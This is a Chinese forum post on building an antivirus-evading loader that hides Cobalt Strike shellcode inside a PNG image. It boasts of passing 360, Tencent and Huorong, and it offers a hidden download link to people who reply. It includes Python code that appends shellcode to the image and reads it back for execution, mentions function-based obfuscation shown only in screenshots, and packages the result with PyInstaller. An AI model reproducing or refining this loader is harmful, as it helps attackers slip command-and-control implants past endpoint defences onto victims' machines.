请选择 进入手机版 | 继续访问电脑版
查看: 1527|回复: 0

Python图片马免杀上线Cobalt Strike

[复制链接]
匿名
匿名  发表于 2023-2-26 21:11:05 |阅读模式
免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


01

免杀效果

360,腾讯,火绒全过,正常上线Cobalt strike

qw5.jpg

02

免杀原理

主要使用的是图片马

首先创建一个给图片加马的脚本,准备一张照片,取名a.png
[AppleScript] 纯文本查看 复制代码
list = b"...shellcode"
png = open('a.png','ab+')#追加写入
png.write(list)
png.close()
print('写入完成')

在图片最后写入shellcode的二进制编码

然后创建一个读取马的脚本
[AppleScript] 纯文本查看 复制代码
png = open('a.png','rb')#二进制方式读取
shellcode = png.read()[-892:]#这里是shellcode的长度

然后给她睡一会也行,给她加个base64也行,这里我选择了python的一个奇怪的特性

一开始怎么加密都过不了火绒,然后就使用了函数加密

qw6.jpg

看起来是不是很混乱
qw7.jpg

这是解密区
qw8.jpg

最后用pyinstaller生成一下
qw9.jpg

正常过360,火绒,腾讯管家

03

下载地址
游客,如果您要查看本帖隐藏内容请回复






qw11.jpg
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表